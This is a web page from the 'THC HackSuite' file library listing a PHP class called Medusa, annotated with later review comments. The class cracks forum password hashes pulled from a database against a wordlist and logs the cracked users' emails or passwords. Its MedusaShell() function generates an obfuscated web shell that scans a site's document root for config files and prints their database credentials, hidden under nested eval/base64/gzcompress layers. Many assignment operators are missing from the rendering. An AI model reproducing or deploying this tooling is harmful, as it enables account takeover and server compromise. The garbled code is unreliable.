HackSuite File Library
File Library
Here you can find the latest files and structure of the THC HackSuite. Note that if you have an earlier version of the suite, updating files manually is not recommended; instead, overwrite your existing HackSuite environment.
<?php
/*
Contains all functionality for Medusa.

Author: Remco Kouw
Site: http://www.hacksuite.com
Last Edit: 12-11-2014
*/

/* THC Medusa Class */
class THC{
    // NOTE(review): the "=" between each property name and its default value appears to have
    // been lost when this listing was rendered (the same happens to many assignments further
    // down); confirm against the original file.
    // Lines of the loaded wordlist; LoadWordlist() stores the result of file() here.
    var 
$aWords "";
    // Settings of the selected product; LoadProperties() copies $_PROPERTIES here.
    var 
$aProperties "";
    // User records; filled from query rows by LoadUsers() or one at a time by SetUser().
    var 
$aUserHash "";
    
/* PHP 4-style constructor (a method named after the class); it does nothing.
   PHP 8 no longer treats a method with the class name as a constructor. */
    
function THC(){
    }
    
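/**
 * Load a wordlist from ../../Wordlists/ into $this->aWords.
 *
 * The requested name goes through ExploitFilter(), and the resolved path is then checked
 * to lie inside the wordlist directory, so the outcome does not rest on the filter alone.
 * Lines keep their trailing newline, exactly as file() returns them.
 *
 * @param string $sWordlist file name (optionally with sub-directories) below the wordlist directory
 * @return bool true when the file was read; false when it is missing, unreadable or
 *              resolves to a location outside the wordlist directory
 */
function LoadWordlist($sWordlist){
    $sBaseDir = "../../Wordlists/";
    $sWordlist = $sBaseDir.$this->ExploitFilter($sWordlist,0,1);
    // realpath() resolves symlinks and any remaining dot segments, so the prefix test below
    // is made on the location that would really be opened.
    $sRealBase = realpath($sBaseDir);
    $sRealFile = realpath($sWordlist);
    if($sRealBase===false || $sRealFile===false){
        return(false);
    }
    if(strpos($sRealFile,rtrim($sRealBase,DIRECTORY_SEPARATOR).DIRECTORY_SEPARATOR)!==0){
        return(false);
    }
    if(false===($aFileData = @file($sRealFile))){
        return(false);
    }
    $this->aWords = $aFileData;
    return(true);
}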
    
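/**
 * Load a product description from ../forums/ and copy its $_PROPERTIES array into
 * $this->aProperties.
 *
 * The file is pulled in with include_once(), so it is executed as PHP. The requested name
 * therefore goes through ExploitFilter() and the resolved path must be a regular file
 * inside the forums directory before it is included.
 *
 * @param string $sProduct file name below the forums directory
 * @return bool true when the file was included and defined $_PROPERTIES, false otherwise
 */
function LoadProperties($sProduct){
    $sBaseDir = "../forums/";
    $sProduct = $sBaseDir.$this->ExploitFilter($sProduct,0,1);
    $sRealBase = realpath($sBaseDir);
    $sRealFile = realpath($sProduct);
    if($sRealBase===false || $sRealFile===false || !is_file($sRealFile)){
        return(false);
    }
    // Containment check on the resolved path: never include anything outside the base directory.
    if(strpos($sRealFile,rtrim($sRealBase,DIRECTORY_SEPARATOR).DIRECTORY_SEPARATOR)!==0){
        return(false);
    }
    include_once($sRealFile);
    // include_once() does not run a file a second time, and a file may simply not define
    // the array; report failure instead of storing an undefined value.
    if(!isset($_PROPERTIES)){
        return(false);
    }
    $this->aProperties = $_PROPERTIES;
    return(true);
}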
    
/**
 * Run the query stored in $this->aProperties['queryraw']['attack'] and collect the rows.
 *
 * Stores the row count in $this->aProperties['total'] and every row, as an associative
 * array, in $this->aUserHash. Uses the legacy mysql_* functions on the default connection.
 *
 * NOTE(review): every call is prefixed with "@", so a failed query is indistinguishable
 * from an empty result here: the row count is then not a positive number and the loop is
 * skipped.
 */
    
function LoadUsers(){
        
$rQuery = @mysql_query($this->aProperties['queryraw']['attack']);
        
// UNCOMMENT IF YOU WANT TO SAVE THE QUERY IN test.txt
        // $this->WriteF("test.txt",$this->aProperties['queryraw']['attack'],"w");
        
$this->aProperties['total'] = @mysql_num_rows($rQuery);
        
// start from an empty list so rows from an earlier call are dropped
$this->aUserHash = array();
        if(
$this->aProperties['total']!=0){
            while(
false!==($aRow = @mysql_fetch_array($rQuery,MYSQL_ASSOC))){
                
$this->aUserHash[] = $aRow;
            }
        }
    }
    
/**
 * Append a single user record to $this->aUserHash without querying a database.
 *
 * @param mixed $aUser record to append; CrackUsers() reads the keys 'crackuser',
 *                     'crackpass' and optionally 'crackhash' from each record
 */
    
function SetUser($aUser){
        
$this->aUserHash[] = $aUser;
    }
    
/**
 * Look up a user's e-mail address.
 *
 * Takes the query template in $this->aProperties['queryraw']['getemail'], replaces the
 * placeholder "/user/" with $sUser, runs it and returns column 'temail' of the first row.
 *
 * NOTE(review): $sUser is substituted into the SQL text as-is; nothing in this method
 * escapes it, so a user name containing SQL metacharacters changes the statement. Escape
 * the value or use a parameterised query.
 * NOTE(review): errors are suppressed with "@"; what is returned for a failed query or an
 * empty result is not visible from here.
 *
 * @param string $sUser user name to look up
 */
    
function GetEmail($sUser){
        
$rQuery = @mysql_query(str_replace("/user/",$sUser,$this->aProperties['queryraw']['getemail']));
        return(@
mysql_result($rQuery,0,'temail'));
    }
    
/**
 * Recompute a password hash for a candidate password with the scheme of the product named
 * in $this->aProperties['name'] and compare it with the stored hash.
 *
 * Most branches derive the value from one or two rounds of MD5 or SHA-1, unsalted or with
 * a single salt. The phpBB, Drupal7, Joomla2/3, Wordpress and Vanilla branches delegate to
 * functions or classes that are not defined in this file and return their verdict directly.
 *
 * Why this matters for defenders: the schemes computed inline are fast digests, so each
 * guess costs almost nothing. Applications should store passwords with password_hash()
 * and verify them with password_verify().
 *
 * NOTE(review): the final comparison uses "==". PHP compares two numeric-looking strings
 * numerically under "==", so unequal digests can compare equal; hash_equals() is the
 * appropriate comparison for digests.
 * NOTE(review): a product name with no matching case leaves $sEncrypt as "", which is then
 * compared with $sHash.
 * NOTE(review): the "?" and ":" of the ternaries and several "=" appear to have been lost
 * when this listing was rendered; confirm against the original file.
 *
 * @param string $sUser user name (only the SMF1/SMF2 branches use it)
 * @param string $sPass candidate password; trimmed before use
 * @param string $sHash stored hash to compare against
 * @param string $sSalt per-user salt for the schemes that have one
 */
    
function UserLogin($sUser,$sPass,$sHash,$sSalt=""){
        
$sEncrypt "";
        
$sPass trim($sPass);
        switch(
$this->aProperties['name']){
            case
"SMF1":
            
$sEncrypt = @sha1(strtolower($sUser).$sPass);
            break;
            case
"SMF2":
            
$sEncrypt = @sha1(strtolower($sUser).$sPass);
            break;
            case
"MyBB":
            
$sEncrypt = @md5(md5($sSalt).md5($sPass));
            break;
            case
"IPB":
            
$sEncrypt = @md5(md5($sSalt).md5($sPass));
            break;
            case
"vBulletin4":
            
$sEncrypt = @md5(md5($sPass).$sSalt);
            break;
            case
"vBulletin3":
            
$sEncrypt = @md5(md5($sPass).$sSalt);
            break;
            case
"vBulletin5":
            
$sEncrypt = @md5(md5($sPass).$sSalt);
            break;
            case
"FluxBB":
            
$sEncrypt = @sha1($sPass);
            break;
            case
"phpBB":
            return(
phpbb_check_hash($sPass,$sHash) ? true false);
            break;
            case
"Drupal6":
            
$sEncrypt = @md5($sPass);
            break;
            case
"Drupal7":
            return(
user_check_password2($sPass,$sHash) ? true false);
            break;
            case
"Dolphin":
            
$sEncrypt sha1(md5($sPass).$sSalt);
            break;
            case
"Joomla3":
            return(
PassHashing($sPass,$sHash) ? true false);
            break;
            case
"Joomla2":
            return(
PassHashing2($sPass,$sHash) ? true false);
            break;
            case
"Wordpress":
            
$cWP = new PasswordHash();
            return(
$cWP->CheckPassword($sPass,$sHash) ? true false);
            case
"Vanilla":
            
$cVanilla = new Gdn_PasswordHash2();
            return(
$cVanilla->CheckPassword($sPass,$sHash,"vanilla") ? true false);            
            break;
            case
"AEF":
            
$sEncrypt md5($sSalt.$sPass);
            break;
            case
"MiniBB":
            
$sEncrypt md5($sPass);
            break;
            case
"Phorum":
            
$sEncrypt md5($sPass);
            break;
            case
"UseBB":
            
$sEncrypt md5($sPass);
            break;
            case
"phpFusion":
            
$sEncrypt hash_hmac("sha256",$sPass,$sSalt);
            break;
            case
"AVS":
            
$sEncrypt md5($sPass);
            break;
            case
"XMB":
            
$sEncrypt md5($sPass);
            break;
        }
        // loose "==" comparison of the recomputed value with the stored hash (see NOTE above)
        return(
$sEncrypt==$sHash true false);
    }
    
/**
 * Check every word in $this->aWords against every record in $this->aUserHash through
 * UserLogin() and persist the progress so that another request can display it.
 *
 * Files written, relative to the working directory (useful as forensic artefacts):
 *   - results/<id>.txt : the serialize()d progress array (start time, totals, match count
 *     and, per match, [user, e-mail] when $iType is 0 or [user, matching word] otherwise);
 *     rewritten at the start, every tenth user, after every match and at the end;
 *   - tasks.php        : one "<id>|<start timestamp>|0" line appended per run, rewritten
 *     to end in "|1" when the run finishes.
 * <id> is the first 10 hex characters of sha1(time().mt_rand(0,10000)).
 *
 * NOTE(review): the result file holds recovered credentials in plain text, and its name is
 * derived from the clock and mt_rand(), neither of which is a cryptographic source.
 * NOTE(review): several "=" appear to have been lost when this listing was rendered;
 * confirm against the original file.
 *
 * @param int $iType 0 stores the user's e-mail (via GetEmail()) with each match; any other
 *                   value stores the matching word instead
 */
    
function CrackUsers($iType){
        
$iUsers count($this->aUserHash);
        if(
$iUsers!=0){
            
// if there are users to crack
            
$aData = array();
            
$aData['tstart'] = time();
            
$aData['total'] = $iUsers;
            
$aData['product'] = $this->aProperties['name'];
            
$aData['version'] = $this->aProperties['version'];
            
$aData['matches'] = 0;
            
$aData['start'] = date('d-m H:i',$aData['tstart']);
            
$aData['current'] = 0;
            
$aData['last_user'] = "";
            
$aData['users'] = array();
            
// create session identifier and filename to store the results into
            
$sFileSession substr(sha1(time().mt_rand(0,10000)),0,10);
            
$sResultsFile "results/".$sFileSession.".txt";
            
$aData['identifier'] = $sFileSession;
            
// create results file
            
$this->WriteF($sResultsFile,serialize($aData),"w");
            
// insert record into task file
            
$this->WriteF("tasks.php",$sFileSession."|".$aData['tstart']."|0\n","a");
            for(
$x=0;$x<$iUsers;$x++){
                
$aData['current']++;
                // integer division result only when 'current' is a multiple of 10,
                // i.e. progress is checkpointed every tenth user
                if(
is_int($aData['current']/10)){
                    
$this->WriteF($sResultsFile,serialize($aData),"w");
                }
                for(
$y=0;$y<count($this->aWords);$y++){
                    if(@
$this->UserLogin($this->aUserHash[$x]['crackuser'],trim($this->aWords[$y]),$this->aUserHash[$x]['crackpass'],(isset($this->aUserHash[$x]['crackhash']) ? $this->aUserHash[$x]['crackhash'] : ""))==true){
                        
// easy user password, store the email and username
                        
$aData['matches']++;
                        
$aData['last_user'] = $this->aUserHash[$x]['crackuser'];
                        if(
$iType==0){ 
                            
$aData['users'][] = array($this->aUserHash[$x]['crackuser'],$this->GetEmail($aData['last_user']));
                        }
                        else{
                            
$aData['users'][] = array($this->aUserHash[$x]['crackuser'],$this->aWords[$y]);
                        }
                        
$this->WriteF($sResultsFile,serialize($aData),"w");
                        continue;
                    }
                }
            }
            
// finalize record in task file
            
$this->WriteF("tasks.php",str_replace($sFileSession."|".$aData['tstart']."|0",$sFileSession."|".$aData['tstart']."|1",file_get_contents("tasks.php")),"w");
            
// finalize record in data file
            
$this->WriteF($sResultsFile,serialize($aData),"w");

        }
    }
    
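/**
 * Read the result file of every task in $aData and return the records as a JSON array.
 *
 * Each entry of $aData is expected to be an array whose element 0 is a task identifier;
 * the record is read from results/<identifier>.txt and unserialize()d. Tasks whose file is
 * missing, empty or not valid serialized data are skipped.
 *
 * NOTE(review): unserialize() is applied to file contents. Anyone able to write into
 * results/ controls what is unserialized here; a data-only format such as JSON for the
 * result files would remove that exposure.
 *
 * @param array $aData list of task rows, e.g. as returned by RawToArray()
 * @return string JSON-encoded list of records ("[]" when nothing could be read)
 */
function CreateJSON($aData){
    $aRecords = array();
    // RawToArray() returns false when the task file cannot be read.
    if(!is_array($aData)){
        return(json_encode($aRecords));
    }
    foreach($aData as $aTask){
        // every iteration is a (running) task
        if(!is_array($aTask) || !isset($aTask[0])){
            continue;
        }
        // basename() keeps a tampered identifier from naming a file outside results/
        $sData = @file_get_contents("results/".basename($aTask[0]).".txt");
        if($sData===false || $sData===""){
            continue;
        }
        $mRecord = @unserialize($sData);
        if($mRecord!==false){
            $aRecords[] = $mRecord;
        }
    }
    return(json_encode($aRecords));
}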
    
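/**
 * List the names of the entries directly inside $sDir that are not directories.
 *
 * @param string $sDir directory to read (not recursive)
 * @return array|false list of file names without path, or false when the directory
 *                     cannot be opened
 */
function GetFilesByDirectory($sDir){
    $rHandle = @opendir($sDir);
    if($rHandle===false){
        return(false);
    }
    $aFileBuffer = array();
    // Compare against false explicitly: an entry named "0" is a valid file name.
    while(false!==($sFile = readdir($rHandle))){
        if($sFile==="." || $sFile===".."){
            continue;
        }
        if(!is_dir($sDir."/".$sFile)){
            // plain append; the original used ".=" on a new element
            $aFileBuffer[] = $sFile;
        }
    }
    closedir($rHandle);
    return $aFileBuffer;
}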
    
/**
 * Collect the path of every file below $sDir, descending into sub-directories.
 *
 * Despite the name, no extension filter is applied: every entry that is not a directory
 * is returned, whatever its type.
 *
 * @param string $sDir directory to walk
 * @return array list of path strings as produced by the directory iterator
 */
function GetPHPFiles($sDir){
    $aPaths = array();
    $oWalker = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($sDir),
        RecursiveIteratorIterator::CHILD_FIRST
    );
    foreach($oWalker as $oEntry){
        // directories (including the "." and ".." entries) are not reported
        if($oEntry->isDir()){
            continue;
        }
        $aPaths[] = (string)$oEntry;
    }
    return($aPaths);
}
    
/**
 * Walk $sDir recursively and return the paths of the files that define $_SYSTEM.
 *
 * Every entry that is not a directory is pulled in with include_once(), and the file is
 * reported when $_SYSTEM is set afterwards.
 *
 * NOTE(review): include_once() executes each file as PHP in this process, so this method
 * runs whatever code is stored anywhere below $sDir. It should only ever be pointed at a
 * directory whose contents are fully trusted and not writable by others.
 * NOTE(review): include_once() does not run a file again once it has been included, so on
 * a later call $_SYSTEM would presumably stay unset for such files - confirm.
 * NOTE(review): an "=" appears to be missing in the $sPath assignment, probably lost when
 * this listing was rendered.
 *
 * @param string $sDir directory to walk
 */
    
function GetSystemFiles($sDir){
        
$iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($sDir),RecursiveIteratorIterator::CHILD_FIRST);
        
$aData = array();
        foreach(
$iterator as $path){
            // clear the marker so a value left by the previous file is not counted again
            unset(
$_SYSTEM);
              if(!
$path->isDir()){
                
$sPath $path->__toString();
                include_once(
$sPath);
                if(isset(
$_SYSTEM)){
                     
$aData[] = $sPath;
                }
              }
        }
        return(
$aData);
    }
    
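/**
 * Read a file and split each of its lines on a separator.
 *
 * Lines are taken as file() returns them, so the last field of each row still carries the
 * line ending.
 *
 * @param string $sFile     path of the file to read
 * @param string $sSeparate field separator; must not be empty
 * @return array|false one array of fields per line, or false when the separator is empty
 *                     or the file is missing, unreadable or empty
 */
function RawToArray($sFile,$sSeparate="|"){
    // explode() cannot split on an empty separator (it raises an error on PHP 8).
    if(!is_string($sSeparate) || $sSeparate===""){
        return(false);
    }
    $aFileData = @file($sFile);
    if(!$aFileData){
        return(false);
    }
    $aDataBuffer = array();
    // explode() always yields at least one element for a non-empty separator, so the
    // original's empty-line branch could never run and has been dropped.
    foreach($aFileData as $sLine){
        $aDataBuffer[] = explode($sSeparate,$sLine);
    }
    return($aDataBuffer);
}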
    
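/**
 * Sanitise a string for the contexts selected by the flags.
 *
 * Non-string input, and any call with all three flags off, is returned unchanged.
 *
 * File-inclusion mode ($bFI) fixes two defects of the earlier version:
 *   - the allowlist pattern had no delimiters, so PCRE took "[" and "]" as the delimiters
 *     and the intended character class never ran; it is now a real character class;
 *   - "../" and "./" were each removed in a single pass, and removing one sequence can
 *     bring the characters around it together into a new one; removal is now repeated
 *     until the string stops changing.
 * The allowlist runs first because dropping a character can itself join up a traversal
 * sequence. A final "." or ".." segment is removed as well.
 *
 * This is a lexical filter only; callers that open or include the resulting path should
 * still verify that the resolved location lies inside the directory they intend.
 *
 * @param mixed $sString value to filter
 * @param bool  $bXSS    strip HTML/PHP tags
 * @param bool  $bFI     reduce to a relative path without traversal sequences
 * @param bool  $bSQL    escape with mysql_real_escape_string() (legacy mysql extension,
 *                       not available from PHP 7 on)
 * @return mixed the filtered string, or the input unchanged (see above)
 */
function ExploitFilter($sString,$bXSS=false,$bFI=false,$bSQL=false){
    if($bXSS==false && $bFI==false && $bSQL==false){
        return($sString);
    }
    if(!is_string($sString)){
        return($sString);
    }
    if($bXSS){
        $sString = strip_tags($sString);
    }
    if($bFI){
        // 1. keep only the allowed characters (this also drops backslashes and NUL bytes)
        $sString = preg_replace('/[^a-zA-Z0-9\-_.\/ ]/','',$sString);
        // 2. strip traversal sequences until a full pass changes nothing
        do{
            $sBefore = $sString;
            $sString = str_replace(array("../","./"),"",$sString);
        }while($sString!==$sBefore);
        // 3. a trailing "." or ".." segment has no slash after it and survives step 2
        $sString = preg_replace('#(^|/)\.{1,2}$#','$1',$sString);
    }
    if($bSQL){
        $sString = mysql_real_escape_string($sString);
    }
    return($sString);
}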
    
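/**
 * Write a string to a file, appending to it or replacing its contents.
 *
 * @param string $sDest  path of the file to write
 * @param string $sWrite data to write
 * @param string $sMode  "a" to append or "w" to overwrite; any other value means "a"
 * @return bool true only when the file was opened and all of $sWrite was written
 */
function WriteF($sDest,$sWrite,$sMode="a"){
    if($sMode!=="a" && $sMode!=="w"){
        $sMode = "a";
    }
    $rNew = @fopen($sDest,$sMode);
    if($rNew===false){
        return(false);
    }
    $sWrite = (string)$sWrite;
    // The earlier version ignored the result of the write and reported success even when
    // nothing reached the file (full disk, quota, I/O error).
    $iWritten = @fwrite($rNew,$sWrite);
    @fclose($rNew);
    return($iWritten!==false && $iWritten===strlen($sWrite));
}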
    
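/**
 * Open a MySQL connection and select a database, using the legacy mysql_* functions
 * (the extension is not available from PHP 7 on).
 *
 * The earlier version ignored both results, so a failed connection went unnoticed until
 * a later query returned nothing. The outcome is now returned; callers that ignore the
 * return value behave as before.
 *
 * @param array $aCredentials keys 'host', 'username', 'password' and 'database'
 * @return bool true when the connection was opened and the database selected
 */
function MySQLConnect($aCredentials){
    $rConnect = @mysql_connect($aCredentials['host'],$aCredentials['username'],$aCredentials['password']);
    if($rConnect===false){
        return(false);
    }
    // select on the connection just opened rather than on "the last opened link"
    return(@mysql_select_db($aCredentials['database'],$rConnect));
}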
    
/**
 * Build the source of a PHP script from a system description and a set of options, then
 * either write it to a file or return it HTML-escaped for display.
 *
 * The generated script, as assembled below: lifts the execution time limit; optionally
 * redirects every request whose REMOTE_ADDR differs from $aOptions['ip']; optionally
 * shows a password form until POST field sPass has the SHA-1 of $aOptions['pass']; then
 * walks DOCUMENT_ROOT for a path containing $aSystem['file'], applies the four
 * $aSystem['patterns'] expressions to that file's contents and prints the captured user,
 * password, host and database values.
 *
 * Detection notes for defenders, all taken from the strings built here:
 *   - plain output contains set_time_limit(0), the REMOTE_ADDR comparison followed by a
 *     redirect to google.com, and a recursive iterator over DOCUMENT_ROOT;
 *   - 'encrypt' set to "normal" wraps the whole body in eval(base64_decode('...'));
 *   - any other 'encrypt' value emits the fixed sentence assigned to $sPull, assembles
 *     function names from its characters into $aF at run time, and wraps the body in
 *     120 to 150 nested $aF[n]('...') calls, so those function names do not appear
 *     literally in the emitted file. The $sPull sentence and the $aF[n](' nesting are
 *     the same in every output and are better scanning anchors than the function names.
 *
 * NOTE(review): $aOptions['ip'] and $aSystem['file'] are concatenated into double-quoted
 * PHP string literals without escaping, and the patterns only have "'" replaced, so the
 * values passed in decide what code ends up in the generated file.
 * NOTE(review): several "=" appear to have been lost when this listing was rendered;
 * confirm against the original file.
 *
 * @param array $aSystem  keys read: 'file' and 'patterns' ('user', 'database', 'password', 'host')
 * @param array $aOptions optional keys read: 'ip', 'pass', 'encrypt', 'shellcreate'
 */
    
function MedusaShell($aSystem,$aOptions){
        
$sShell "set_time_limit(0);\n";
        
$sTemplate "";
        if(isset(
$aOptions['ip'])){
            
// ip protection
            
$sShell .= "if(\$_SERVER['REMOTE_ADDR']!=\"".$aOptions['ip']."\"){\n";
            
$sShell .= "    header(\"Location: http://www.google.com\");\n";
            
$sShell .= "    exit;\n";
            
$sShell .= "}\n";
        }
        if(isset(
$aOptions['pass'])){
            
// password protection
            
$sShell .= "if(!isset(\$_POST['sPass']) || sha1(\$_POST['sPass'])!=\"".sha1($aOptions['pass'])."\"){\n";
            
$sShell .= "    echo'<html>\n";
            
$sShell .= "    <head></head>\n";
            
$sShell .= "    <body>\n";
            
$sShell .= "    <form method=\"post\">\n";
            
$sShell .= "    <input type=\"password\" name=\"sPass\" /> <input type=\"submit\" name=\"submit\" value=\"Submit\" />\n";
            
$sShell .= "    </form>\n";
            
$sShell .= "    </body>\n";
            
$sShell .= "    </html>';\n";
            
$sShell .= "    exit;\n";
            
$sShell .= "}\n";
        }
        
// create shell based on system array
        
$sShell .= "\$iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator(\$_SERVER['DOCUMENT_ROOT']),RecursiveIteratorIterator::CHILD_FIRST);\n";
        
$sShell .= "foreach(\$iterator as \$path){\n";
        
$sShell .= "    if(!\$path->isDir()){\n";
        
$sShell .= "        \$sPath = \$path->__toString();\n";
        
$sShell .= "        \$sFile = \"".$aSystem['file']."\";\n";
        
$sShell .= "        if(strtoupper(substr(PHP_OS,0,3))==='WIN'){\n";
        
$sShell .= "            \$sFile = str_replace(\"/\",\"\\\\\",\$sFile);\n";
        
$sShell .= "        }\n";
        
$sShell .= "        if(strpos(\$sPath,\$sFile)!==false){\n";
        
$sShell .= "            \$sData = file_get_contents(\$sPath);\n";
        
$sShell .= "            preg_match('".str_replace("'","\'",$aSystem['patterns']['user'])."',\$sData,\$aUser);\n";
        
$sShell .= "            if(!isset(\$aUser[1])){\n";
        
$sShell .= "                continue;\n";
        
$sShell .= "            }\n";
        
$sShell .= "            preg_match('".str_replace("'","\'",$aSystem['patterns']['database'])."',\$sData,\$aDB);\n";
        
$sShell .= "            preg_match('".str_replace("'","\'",$aSystem['patterns']['password'])."',\$sData,\$aPass);\n";
        
$sShell .= "            preg_match('".str_replace("'","\'",$aSystem['patterns']['host'])."',\$sData,\$aHost);\n";
        
$sShell .= "            \$sResult = \"<b>user:</b> \".\$aUser[1].\"<br />\";\n";
        
$sShell .= "            \$sResult .= \"<b>pass:</b> \".\$aPass[1].\"<br />\";\n";
        
$sShell .= "            \$sResult .= \"<b>host:</b> \".\$aHost[1].\"<br />\";\n";
        
$sShell .= "            \$sResult .= \"<b>database:</b> \".\$aDB[1].\"<br />\";\n";
        
$sShell .= "            die(\$sResult);\n";
        
$sShell .= "        }\n";
        
$sShell .= "    }\n";
        
$sShell .= "}\n";
        
$sShell .= "die(\"Failed to get login information.\");\n";
        if(isset(
$aOptions['encrypt'])){
            
// source protection
            
if($aOptions['encrypt']=="normal"){
                
$sShell "eval(base64_decode('".base64_encode($sShell)."'));\n";
            }
            else{
                
$sEncoder "\$sPull = \"leverage the inflatable base 4/16 and_or gza jump to tor strings code compressing unescaped\";\n";
                
$sEncoder .= "\$aPull = explode(\" \",\$sPull);\n";
                
$sEncoder .= "\$aF = array();\n";
                
$sEncoder .= "\$aF[] = \$sPull[1].\$sPull[2].\$sPull[5].\$sPull[0];\n";//eval
                
$sEncoder .= "\$aF[] = substr(\$sPull,57,3).\$sPull[4].\$aF[0][0].\$aF[0][1];\n";//strrev
                
$sEncoder .= "\$aF[] = substr(\$sPull,41,2).substr(\$sPull,13,6).\$aF[0][0];\n";//gzinflate
                
$sEncoder .= "\$aF[] = \$aF[2][0].\$aF[2][1].\$sPull[(strpos(\$sPull,\"_\")-1)].\$aF[0][0].substr(\$aF[2],4);\n";//gzdeflate
                
$sEncoder .= "\$aF[] = \$aPull[3].str_replace(\"1/\",\"\",\$aF[1](\$aPull[4])).\"_\".\$aF[0][0].\$aF[2][3].\$aPull[11];\n";//base64_encode
                
$sEncoder .= "\$aF[] = substr(\$aF[4],0,7).\$aF[3][2].\$aF[0][0].substr(\$aF[4],9);\n";//base64_decode
                
$sEncoder .= "\$aF[] = substr(\$aF[3],0,2).substr(\$aPull[13],0,2).substr(\$aPull[12],0,8);\n";//gzuncompress
                
$sEncoder .= "\$aF[] = str_replace(substr(\$aPull[13],0,2),\"\",\$aF[6]);\n";//gzcompress
                // encode and decode functions
                
$_ENCODE = array();
                
$_ENCODE[0] = array(7,"gzcompress");
                
$_ENCODE[1] = array(4,"base64_encode");
                
$_DECODE = array();
                
$_DECODE[0] = array(6,"gzuncompress");
                
$_DECODE[1] = array(5,"base64_decode");
                
// good luck decrypting the shell :p
                
$iEncryptions count($_ENCODE)-1;
                
$iEncryptionLoops mt_rand(120,150);
                for(
$x=0;$x<$iEncryptionLoops;$x++){
                    
$iEncryption mt_rand(0,$iEncryptions);
                    
$sShell "\$aF[".$_ENCODE[$iEncryption][0]."]('".$_ENCODE[$iEncryption][1]($sShell)."')";
                }
                
$sShell $sEncoder.$sShell.";";
            }
        }
        if(isset(
$aOptions['shellcreate'])){
            
// save source
            
return($this->WriteF($aOptions['shellcreate'],"<?php\n".$sShell."?>","w"));
        }
        else{
            
// no target file given: return the source escaped for display in a browser
$sShell str_replace("\n","<br />\n",htmlspecialchars("<?php\n".$sShell)."?>");
            return(
$sShell);
        }
    }
}
?>
disclaimer
We are not responsible for any direct or indirect damage caused by abusing the tools provided on hacksuite.com. The suite is developed for educational purposes, use at your own risk!
Created by Remco Kouw. Powered by protein shakes and a high calorie diet.